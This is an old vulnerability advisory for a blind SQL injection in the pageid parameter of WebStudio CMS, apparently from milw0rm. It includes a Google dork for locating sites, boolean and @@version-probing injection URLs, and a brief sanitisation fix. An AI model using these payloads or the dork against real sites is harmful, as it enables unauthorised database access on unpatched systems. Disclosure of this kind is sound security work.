112 lines
No EOL
1.5 KiB
Text
112 lines
No EOL
1.5 KiB
Text
Application: WebStudio CMS
|
|
|
|
|
|
|
|
Vendor Name: BDigital Media Ltd
|
|
|
|
|
|
|
|
Vendors Url: http://www.bdigital.biz
|
|
|
|
|
|
|
|
Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability
|
|
|
|
|
|
|
|
Exploitation: Remote
|
|
|
|
|
|
|
|
Severity: Critical
|
|
|
|
|
|
|
|
Solution Status: Unpatched
|
|
|
|
|
|
|
|
Introduction: WebStudio CMS is a modular Web Content Management System
|
|
solution.
|
|
|
|
|
|
|
|
Google Dork: "Powered by WebStudio"
|
|
|
|
|
|
|
|
|
|
|
|
Description:
|
|
|
|
|
|
|
|
WebStudio CMS is prone to an SQL-injection vulnerability because it fails to
|
|
sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application,
|
|
access or modify data, or exploit latent vulnerabilities in the underlying
|
|
database.
|
|
|
|
|
|
|
|
PoC:
|
|
|
|
|
|
|
|
http://localhost/index.php?pageid=1+and+1=1 ( TRUE )
|
|
|
|
|
|
|
|
http://localhost/index.php?pageid=1+and+1=2 ( FALSE )
|
|
|
|
|
|
|
|
Exploit:
|
|
|
|
|
|
|
|
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE )
|
|
|
|
|
|
|
|
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )
|
|
|
|
|
|
|
|
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )
|
|
|
|
|
|
|
|
Solution:
|
|
|
|
|
|
|
|
There was no vendor-supplied solution at the time of entry.
|
|
|
|
|
|
|
|
Edit source code manually to ensure user-supplied input is correctly
|
|
sanitised.
|
|
|
|
|
|
|
|
|
|
|
|
Credits:
|
|
|
|
|
|
|
|
Charalambous Glafkos
|
|
|
|
Email: glafkos (at) astalavista (dot) com
|
|
|
|
___________________________________________
|
|
|
|
ASTALAVISTA - the hacking & security community
|
|
|
|
www.astalavista.com
|
|
|
|
www.astalavista.net
|
|
|
|
# milw0rm.com [2008-11-24] |